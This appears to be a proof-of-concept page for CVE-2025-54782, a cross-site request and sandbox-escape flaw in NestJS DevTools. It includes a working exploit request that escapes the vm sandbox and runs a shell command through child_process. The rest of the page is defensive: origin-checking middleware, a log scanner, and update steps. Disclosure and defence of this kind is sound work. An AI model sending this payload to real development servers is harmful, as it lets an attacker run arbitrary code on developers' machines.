
CVE-2025-54782 PoC — @nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers

Associated Vulnerability

Title: @nestjs/devtools-integration's CSRF to Sandbox Escape Allows for RCE against JS Developers (CVE-2025-54782)

Description: Nest is a framework for building scalable Node.js server-side applications. In versions 0.2.0 and below, a critical Remote Code Execution (RCE) vulnerability was discovered in the @nestjs/devtools-integration package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (safe-eval-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine. The package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, /inspector/graph/interact, accepts JSON input containing a code field and executes the provided code in a Node.js vm.runInNewContext sandbox. This is fixed in version 0.2.1.
Description: NestJS DevTools Unauthenticated RCE

Readme
# CVE-2025-54782: Critical Bug in NestJS DevTools

🚨 **Critical Security Issue** - CVSS Score: 9.4/10

## Discovery

A critical security vulnerability was discovered in NestJS DevTools that allows attackers to execute arbitrary code on developers' machines through malicious websites. This represents a significant security risk as it can lead to complete system compromise.

## The Problem

**Affected Package:** `@nestjs/devtools-integration` version 0.2.0 and below  
**What Goes Wrong:** The package creates a local development server with insufficient security controls  
**Who's At Risk:** Any developer using NestJS DevTools in their local environment

### How The Attack Works

When you have NestJS DevTools running, it starts a local server (usually on port 3000). This server has an endpoint at `/inspector/graph/interact` that's supposed to help with debugging. But here's the problem:

1. **Missing Access Controls** - Cross-origin requests are permitted to the local development server
2. **Inadequate Sandboxing** - The JavaScript execution sandbox can be bypassed
3. **Privilege Escalation** - Successful sandbox escape grants full system access

### Real Attack Example

A malicious website could send this request to your local NestJS server:

```http
POST /inspector/graph/interact HTTP/1.1
Content-Type: text/plain

{"code":"(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami')}})()"}
```

This payload demonstrates:
- Sandbox escape via exception handling and constructor manipulation
- Process object access through prototype chain exploitation
- Command execution via child_process module
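The missing control in point 1 above is a browser-facing one: a loopback connection tells the server nothing about which web page initiated the request, but the `Origin`, `Sec-Fetch-Site` and `Host` headers do. The following is an added example written for this page, not code from the advisory or from the `@nestjs/devtools-integration` project (whose actual fix in 0.2.1 is not shown here). It implements that check as a request classifier and a Connect/Express-style middleware, and replays constructed access-log lines through the same policy so the cross-site hits on `/inspector/graph/interact` can be flagged after the fact. All function names, the allow-list defaults and the JSON log format are hypothetical.

```javascript
// Added example, written for this page; it is not code from the advisory
// or from the @nestjs/devtools-integration project, and the function names
// and log format are hypothetical. It shows the control the vulnerable
// endpoint lacked: refusing cross-site browser requests to a loopback dev
// server, plus a scan over constructed access-log lines for the same condition.

const INTERACT_PATH = '/inspector/graph/interact';
const LOOPBACK_HOSTS = new Set(['localhost', '127.0.0.1', '[::1]']);

// Decide whether a request to a local dev endpoint may be served.
// Browsers attach Origin (and Sec-Fetch-Site) to cross-site POSTs, so a
// foreign Origin means another web page initiated the request, even
// though the TCP connection arrives from the loopback interface.
function classifyRequest(headers, allowedOrigins = ['http://localhost:3000', 'http://127.0.0.1:3000']) {
  // Node lowercases header names already; normalise anyway for other callers.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;

  const site = h['sec-fetch-site'];
  if (site && site !== 'same-origin' && site !== 'none') {
    return { allow: false, reason: `sec-fetch-site=${site}` };
  }
  const origin = h['origin'];
  if (origin !== undefined && !allowedOrigins.includes(origin)) {
    return { allow: false, reason: `foreign origin ${origin}` };
  }
  // The Host header must name a loopback address; a DNS-rebinding style
  // request arrives with the attacker's hostname here instead.
  const host = (h['host'] || '').replace(/:\d+$/, '');
  if (!LOOPBACK_HOSTS.has(host)) {
    return { allow: false, reason: `unexpected host ${h['host'] || '(missing)'}` };
  }
  return { allow: true, reason: 'same-origin or non-browser client' };
}

// Connect/Express-style middleware built on classifyRequest.
function originGuard(options = {}) {
  return function (req, res, next) {
    const verdict = classifyRequest(req.headers, options.allowedOrigins);
    if (!verdict.allow) {
      res.statusCode = 403;
      res.end('blocked: ' + verdict.reason);
      return;
    }
    next();
  };
}

// Constructed sample access log (one JSON object per line), not captured traffic.
const SAMPLE_LOG = [
  '{"ts":"2025-08-01T10:00:00Z","method":"GET","path":"/inspector/graph","origin":null,"host":"localhost:3000"}',
  '{"ts":"2025-08-01T10:00:05Z","method":"POST","path":"/inspector/graph/interact","origin":"http://localhost:3000","host":"localhost:3000"}',
  '{"ts":"2025-08-01T10:02:11Z","method":"POST","path":"/inspector/graph/interact","origin":"https://attacker.example","host":"localhost:3000"}',
  '{"ts":"2025-08-01T10:03:40Z","method":"POST","path":"/inspector/graph/interact","origin":null,"host":"devbox.attacker.example:3000"}',
].join('\n');

// Replay logged POSTs to the interact endpoint through the same policy and
// return the entries a guard would have blocked.
function scanAccessLog(text) {
  const hits = [];
  for (const line of text.split('\n')) {
    if (!line.trim()) continue;
    const entry = JSON.parse(line);
    if (entry.method !== 'POST' || entry.path !== INTERACT_PATH) continue;
    const headers = { host: entry.host };
    if (entry.origin !== null) headers.origin = entry.origin;
    const verdict = classifyRequest(headers);
    if (!verdict.allow) hits.push({ ts: entry.ts, reason: verdict.reason });
  }
  return hits;
}

console.log(JSON.stringify(scanAccessLog(SAMPLE_LOG), null, 2));
```

Mounting `app.use('/inspector', originGuard())` in front of the inspector routes rejects the request shown in the payload above, because a browser sends it with the malicious page's `Origin`. Note that the guard deliberately lets requests with no `Origin` and a loopback `Host` through, so non-browser clients such as the DevTools UI's own tooling keep working; a request from `curl` on the same machine is not the threat this control addresses.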

## Security Impact

- **Remote Code Execution** - Complete system compromise potential
- **Silent Exploitation** - Attacks occur without user awareness
- **Low Attack Complexity** - Simple web interaction triggers exploitation
- **Developer Targeting** - Could facilitate supply chain attacks on development environments

## Remediation

**Immediate Action Required:** Update the package:

```bash
npm update @nestjs/devtools-integration
```

**Verify Installation:**
```bash
npm ls @nestjs/devtools-integration
```

Ensure you're running version **0.2.1 or later**.

## Timeline

- Found the vulnerability while testing NestJS DevTools
- Reported it to the NestJS team
- They fixed it in version 0.2.1
- CVE-2025-54782 was assigned
- Now sharing this publicly to help other developers stay safe

## Official References

- [Socket.dev Blog Post](https://socket.dev/blog/nestjs-rce-vuln)
- [NestJS Security Advisory](https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7)
- [Official CVE Entry](https://nvd.nist.gov/vuln/detail/CVE-2025-54782)
